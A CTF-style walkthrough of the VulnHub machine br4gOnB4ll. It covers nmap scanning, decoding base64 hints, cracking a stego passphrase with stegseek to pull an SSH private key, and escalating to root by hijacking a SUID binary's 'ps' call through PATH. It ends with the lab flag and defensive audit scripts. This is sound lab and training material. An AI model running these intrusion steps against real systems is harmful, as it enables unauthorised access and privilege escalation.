br4gOnB4ll machine notes

This is a free machine on VulnHub and a fairly easy one.

1. Host discovery

Host discovery: -sn does a ping sweep only, no port scan
nmap -sn 192.168.84.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:37 EDT
Nmap scan report for 192.168.84.1
Host is up (0.00045s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.84.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:FC:23:E6 (VMware)
Nmap scan report for 192.168.84.154
Host is up (0.00024s latency).
MAC Address: 00:0C:29:30:12:59 (VMware)
Nmap scan report for 192.168.84.254
Host is up (0.00027s latency).
MAC Address: 00:50:56:FA:CE:D8 (VMware)
Nmap scan report for 192.168.84.133
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds

192.168.84.154 is identified as the target machine.

2. Standard nmap port scan

1) Port probe
# -sT TCP connect scan   --min-rate 10000 send packets at no less than 10000/s   -p- scan all 65535 ports
nmap -sT --min-rate 10000 -p- 192.168.84.154
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:43 EDT
Nmap scan report for 192.168.84.154
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:30:12:59 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
Ports 22 (ssh) and 80 (http) are open.
2) Service version probe
# -sT TCP connect scan  -sV probe service versions  -sC run the default NSE scripts  -O detect the target OS
nmap -sT -sV -sC -O -p22,80 192.168.84.154
Starting Nmap 7.93 ( https://nmap.org ) at 2024-07-07 07:52 EDT
Nmap scan report for 192.168.84.154
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b5774c88d727541c561d48d9a41e2891 (RSA)
| 256 c6a8c89eed0d671faead6bd5ddf157a1 (ECDSA)
|_ 256 faa9b0e3062b9263ba112f94d63190b2 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: DRAGON BALL | Aj's
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:30:12:59 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.99 seconds

3. Web: visit port 80 in a browser

1) Information gathering

The site is a DRAGON BALL page; after reading through its content, nothing useful turns up.

Next check robots.txt, the page source and so on; brute-force directories if needed.

a. robots.txt

It holds a string ending in =, most likely base64. Decode it:

echo -n "eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI=" | base64 -d

you find the hidden dir    # plaintext: it says we have found a hidden directory
b. Page source

Another base64 string; decode it:

echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d
UkZKQlIwOU9JRUpCVEV3PQ==   # still base64, decode again
echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d
RFJBR09OIEJBTEw=   # nested once more, keep going
echo -n "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09" | base64 -d | base64 -d | base64 -d
DRAGON BALL   # finally plaintext
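The three manual decode rounds above can be automated: keep decoding while the result is still valid base64 and still printable text, and stop at the first layer that is not. The function below is an added example, not part of the original notes; it assumes GNU coreutils `base64` (which exits non-zero on input outside the alphabet) and uses the two strings from this page as constructed inputs.

```shell
#!/bin/sh
# peel_base64 STRING [MAX_DEPTH]
# Repeatedly base64-decode STRING until the result is no longer valid base64
# or no longer printable text, then print the innermost plaintext.
# Assumes GNU coreutils `base64`, which rejects invalid input with exit 1.
peel_base64() {
    cur=$1
    depth=0
    max=${2:-10}                      # guard against runaway loops
    while [ "$depth" -lt "$max" ]; do
        # The substitution fails when base64 refuses the input, e.g.
        # "DRAGON BALL" contains a space, which is not in the alphabet.
        next=$(printf '%s' "$cur" | base64 -d 2>/dev/null) || break
        # A short word such as "love" is also valid base64 but decodes to
        # binary junk; stop when the output is not printable text.
        if printf '%s' "$next" | LC_ALL=C grep -q '[^[:print:][:space:]]'; then
            break
        fi
        [ -n "$next" ] || break
        cur=$next
        depth=$((depth + 1))
    done
    printf '%s\n' "$cur"
}

# Constructed demo: the strings found in robots.txt and in the page source.
peel_base64 "eW91IGZpbmQgdGhlIGhpZGRlbiBkaXI="   # you find the hidden dir
peel_base64 "VWtaS1FsSXdPVTlKUlVwQ1ZFVjNQUT09"   # DRAGON BALL
```

Input that is not base64 at all is returned unchanged, so the function can be run over every suspicious string found during enumeration without special-casing plaintext.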

Combining a and b, DRAGON BALL is very likely the hidden directory; append it to the URL and check.

2) The hidden directory
http://192.168.84.154/DRAGON%20BALL/   # %20 is the URL-encoded space

Look at what it contains.

a) secret.txt: scripted check
wget http://192.168.84.154/DRAGON%20BALL/secret.txt   # download it

cat secret.txt
/facebook.com
/youtube.com
/google.com
/vanakkam nanba
/customer
/customers
/taxonomy
/username
/passwd
/yesterday
/yshop
/zboard
/zeus
/aj.html
/zoom.html
/zero.html
/welcome.html

secret.txt looks like a list of paths; the few I tried by hand all returned 404, so let's script the requests to make sure nothing useful is missed.

vim secret.txt   # delete the two trailing blank lines so they don't get in the way

Script idea: build each URL, request it with curl, and look at the status code.

Since the prefix is unknown, prepend each of the directories we know about:

# 1. prepend http://192.168.84.154 (sed s = substitute)
sed 's|^|http://192.168.84.154|' secret.txt | tee secret_ext.txt
# 2. prepend /DRAGON%20BALL; tee -a appends, without -a the file would be overwritten
sed 's|^|http://192.168.84.154/DRAGON%20BALL|' secret.txt | tee -a secret_ext.txt
# 3. prepend /DRAGON%20BALL/Vulnhub
sed 's|^|http://192.168.84.154/DRAGON%20BALL/Vulnhub|' secret.txt | tee -a secret_ext.txt
# 4. fix the spaces by hand, only three occurrences
vim secret_ext.txt
# /vanakkam nanba ==> /vanakkam%20nanba

Request them:

# read -r keeps backslashes literal; -o /dev/null discards the body; -s silent; -w custom output: url_effective is the URL actually requested, http_code the status code
while read -r url;do curl -o /dev/null -s -w "%{url_effective} http code:%{http_code}\n" "$url";done < secret_ext.txt
http://192.168.84.154/facebook.com http code:404
http://192.168.84.154/youtube.com http code:404
http://192.168.84.154/google.com http code:404
http://192.168.84.154/vanakkam%20nanba http code:404
http://192.168.84.154/customer http code:404
http://192.168.84.154/customers http code:404
http://192.168.84.154/taxonomy http code:404
http://192.168.84.154/username http code:404
http://192.168.84.154/passwd http code:404
http://192.168.84.154/yesterday http code:404
http://192.168.84.154/yshop http code:404
http://192.168.84.154/zboard http code:404
http://192.168.84.154/zeus http code:404
http://192.168.84.154/aj.html http code:404
http://192.168.84.154/zoom.html http code:404
http://192.168.84.154/zero.html http code:404
http://192.168.84.154/welcome.html http code:404
http://192.168.84.154/DRAGON%20BALL/facebook.com http code:404
http://192.168.84.154/DRAGON%20BALL/youtube.com http code:404
http://192.168.84.154/DRAGON%20BALL/google.com http code:404
http://192.168.84.154/DRAGON%20BALL/vanakkam%20nanba http code:404
http://192.168.84.154/DRAGON%20BALL/customer http code:404
http://192.168.84.154/DRAGON%20BALL/customers http code:404
http://192.168.84.154/DRAGON%20BALL/taxonomy http code:404
http://192.168.84.154/DRAGON%20BALL/username http code:404
http://192.168.84.154/DRAGON%20BALL/passwd http code:404
http://192.168.84.154/DRAGON%20BALL/yesterday http code:404
http://192.168.84.154/DRAGON%20BALL/yshop http code:404
http://192.168.84.154/DRAGON%20BALL/zboard http code:404
http://192.168.84.154/DRAGON%20BALL/zeus http code:404
http://192.168.84.154/DRAGON%20BALL/aj.html http code:404
http://192.168.84.154/DRAGON%20BALL/zoom.html http code:404
http://192.168.84.154/DRAGON%20BALL/zero.html http code:404
http://192.168.84.154/DRAGON%20BALL/welcome.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/facebook.com http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/youtube.com http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/google.com http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/vanakkam%20nanba http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/customer http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/customers http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/taxonomy http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/username http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/passwd http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/yesterday http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/yshop http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zboard http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zeus http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/aj.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zoom.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/zero.html http code:404
http://192.168.84.154/DRAGON%20BALL/Vulnhub/welcome.html http code:404

All 404: clearly nothing useful here.
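The sed, vim and curl steps above can be folded into one script that builds the candidate URLs from the wordlist and the known base paths, percent-encodes spaces instead of editing them by hand, skips the blank lines, and records status codes. This is an added example, not part of the original notes; the sample input files are constructed here from a few of the entries shown above, and requests are only sent when the script is run with `--probe`, so the URL building can be checked without network access.

```shell
#!/bin/sh
# build_urls BASES_FILE PATHS_FILE
# Print every base+path combination, percent-encoding spaces and skipping
# blank lines (secret.txt ends with two of them).
build_urls() {
    while IFS= read -r base || [ -n "$base" ]; do
        [ -n "$base" ] || continue
        while IFS= read -r path || [ -n "$path" ]; do
            [ -n "$path" ] || continue
            enc=$(printf '%s' "$path" | sed 's/ /%20/g')
            printf '%s%s\n' "${base%/}" "$enc"
        done < "$2"
    done < "$1"
}

# probe_urls < URL_LIST
# Request each URL and print "url status"; the body is discarded.
probe_urls() {
    while IFS= read -r url; do
        curl -o /dev/null -s -w '%{url_effective} %{http_code}\n' "$url"
    done
}

# write_samples: constructed inputs mirroring the page; prints the temp dir.
write_samples() {
    dir=$(mktemp -d)
    printf '%s\n' 'http://192.168.84.154' \
                  'http://192.168.84.154/DRAGON%20BALL' \
                  'http://192.168.84.154/DRAGON%20BALL/Vulnhub' > "$dir/bases.txt"
    printf '%s\n' '/facebook.com' '/vanakkam nanba' '/customer' '/aj.html' '' '' > "$dir/paths.txt"
    printf '%s\n' "$dir"
}

# Usage: sh probe.sh            -> list the URLs that would be requested
#        sh probe.sh --probe    -> actually request them
samples=$(write_samples)
if [ "${1-}" = "--probe" ]; then
    build_urls "$samples/bases.txt" "$samples/paths.txt" | probe_urls
else
    build_urls "$samples/bases.txt" "$samples/paths.txt"
fi
```

Replacing the constructed files with the real secret.txt and a bases file of your own reproduces the 51-request run above; keeping the list and the requester separate means the URL list can be reviewed before anything is sent.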

b) The Vulnhub directory

It holds an image aj.jpg and a login page login.html.

Download the image; the login page mentions xmen, which might be a username.

wget http://192.168.84.154/DRAGON%20BALL/Vulnhub/aj.jpg

Inspect the image:

ls -liah aj.jpg

4850810 -rw-r--r-- 1 root root 74K 2021年 1月 5日 aj.jpg
file aj.jpg

aj.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 959x535, components 3
# check for bundled/appended files
binwalk aj.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
# nothing found
# check for steganographic content
steghide info aj.jpg
"aj.jpg":
format: jpeg
capacity: 4.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!

Note: this is steghide's normal interactive prompt; it does not tell us whether aj.jpg carries hidden data. Without the passphrase we cannot decide yet.

Deciding whether there is steganography means combining technical observation with an assessment of the attack surface.

Try brute-forcing the passphrase:

stegseek aj.jpg /usr/share/wordlists/rockyou.txt

StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "love"
[i] Original filename: "id_rsa".
[i] Extracting to "aj.jpg.out".

It produced aj.jpg.out, originally named id_rsa, which looks like a credential.

mv aj.jpg.out id_rsa   # restore the original name
cat id_rsa             # view it
-----BEGIN OPENSSH PRIVATE KEY-----

The header alone shows this is an SSH private key.

4. Finding a foothold

Try connecting over ssh.

chmod 600 id_rsa   # restrict permissions; ssh refuses a key readable by other users

ssh root@192.168.84.154 -i id_rsa
root@192.168.84.154's password:
Permission denied, please try again.

Clearly id_rsa is not root's key.

Recall that login.html mentioned xmen; perhaps the key belongs to that user. Try it:

ssh xmen@192.168.84.154 -i id_rsa
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 4 04:03:23 2024 from 192.168.84.133
xmen@debian:~$

Logged in.

Basic enumeration
xmen@debian:~$ uname -a
Linux debian 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
xmen@debian:~$ id
uid=1000(xmen) gid=1000(xmen) groups=1000(xmen),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
xmen@debian:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:30:12:59 brd ff:ff:ff:ff:ff:ff
inet 192.168.84.154/24 brd 192.168.84.255 scope global dynamic ens33
valid_lft 1099sec preferred_lft 1099sec
inet6 fe80::20c:29ff:fe30:1259/64 scope link
valid_lft forever preferred_lft forever

5. Privilege escalation to root

Look for root-owned files with the SUID bit (u+s) set:

find / -perm -4000 -type f 2> /dev/null

/home/xmen/script/shell
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd

One of them, /home/xmen/script/shell, lives in the user's own home directory yet runs as root; take a look at it.

xmen@debian:~/script$ ls -liah
total 32K
269007 drwxr-xr-x 2 root root 4.0K Jan 4 2021 .
267590 drwxr-xr-x 4 xmen xmen 4.0K Jul 4 04:15 ..
269009 -rw-r--r-- 1 root root 75 Jan 4 2021 demo.c
269016 -rwsr-xr-x 1 root root 17K Jan 4 2021 shell
Look at demo.c
xmen@debian:~/script$ cat demo.c
#include <unistd.h>
#include <stdlib.h>   /* for system() */

void main()
{
    setuid(0);        /* become root: the binary is SUID root */
    setgid(0);
    system("ps");     /* relative command name, resolved through the caller's PATH */
}

Run the shell binary:

xmen@debian:~/script$ ./shell
PID TTY TIME CMD
1232 pts/0 00:00:00 shell
1233 pts/0 00:00:00 sh
1234 pts/0 00:00:00 ps

We suspect the shell binary is compiled from demo.c.

Exploit system("ps") to escalate: ps is called by a relative name, so a fake ps that appears earlier in PATH gets executed as root.

cd /home/xmen
echo "/bin/bash" > ps     # fake "ps" that just starts a shell
chmod 777 ps
export PATH=.:$PATH       # current directory is searched first
which ps

xmen@debian:~$ which ps
./ps
Run the shell binary:
xmen@debian:~$ /home/xmen/script/shell
root@debian:~#

Root obtained.

root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(xmen)
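From the defender's side, the two conditions this escalation relied on are easy to audit: a root-owned SUID binary living outside the system directories, and a PATH in which a relative entry or a world-writable directory can shadow a command name such as ps. The script below is an added example, not part of the original notes; the SUID list in its demo is constructed from the `find` output above, and the directory allowlist is an assumption that a real audit would tune to the distribution.

```shell
#!/bin/sh
# suid_outside_std < SUID_LIST
# Pass only SUID paths that are not under the usual system directories.
# The allowlist (bin, sbin, lib, lib64, libexec under / and /usr[/local])
# is an assumption; tune it for the system being audited.
suid_outside_std() {
    grep -Ev '^/(usr/(local/)?)?(s?bin|lib|lib64|libexec)/' || true
}

# unsafe_path_entries PATH_STRING
# Print PATH entries a local user could use to shadow a command name:
# empty or relative entries ("", ".", "./x") and world-writable directories.
unsafe_path_entries() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r entry; do
        case "$entry" in
            '')  printf 'relative: <empty>\n'; continue ;;
            /*)  ;;
            *)   printf 'relative: %s\n' "$entry"; continue ;;
        esac
        # the other-write bit is the 9th character of "ls -ld" output (drwxrwxrwt)
        if [ -d "$entry" ] && [ "$(ls -ld "$entry" | cut -c9)" = "w" ]; then
            printf 'world-writable: %s\n' "$entry"
        fi
    done
}

# audit_host: run both checks against the live system.
audit_host() {
    echo "== SUID binaries outside system directories =="
    find / -perm -4000 -type f 2>/dev/null | suid_outside_std
    echo "== risky PATH entries for $(id -un) =="
    unsafe_path_entries "$PATH"
}

# Constructed demo with the values from this walkthrough.
demo_suid_list='/home/xmen/script/shell
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/sudo'
printf '%s\n' "$demo_suid_list" | suid_outside_std           # /home/xmen/script/shell
unsafe_path_entries '.:/usr/local/bin:/usr/bin:/bin'          # relative: .
```

Run `audit_host` from a cron job or a configuration check to catch both findings early; on the code side, the fix for demo.c is to call the program by absolute path and to reset PATH (or the whole environment) before `system()`, since a SUID program must never trust the caller's PATH.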

Grab the flag

root@debian:/root# cat /root/proof.txt
_____ __________
/ \\______ \ ___ ___ _____ ____ ____
/ \ / \| _/ \ \/ // \_/ __ \ / \
/ Y \ | \ > <| Y Y \ ___/| | \
\____|__ /____|_ /__________/__/\_ \__|_| /\___ >___| /
\/ \/_____/_____/ \/ \/ \/ \/
join channel: https://t.me/joinchat/St01KnXzcGeWMKSC
your flag: 031f7d2d89b9dd2da3396a0d7b7fb3e2

Summary

1. nmap found ssh on port 22 and http on port 80.

2. Analysis of the http service (robots.txt and the page source) revealed the hidden directory DRAGON BALL, which contained secret.txt and a Vulnhub directory; both were examined.

3. The Vulnhub directory held the image aj.jpg and the page login.html:

   1) aj.jpg yielded the ssh private key id_rsa

   2) login.html gave the key's user, xmen

4. With a shell as the regular user xmen, enumerating u+s files led to a SUID privilege escalation to root.

5. Root's flag obtained.
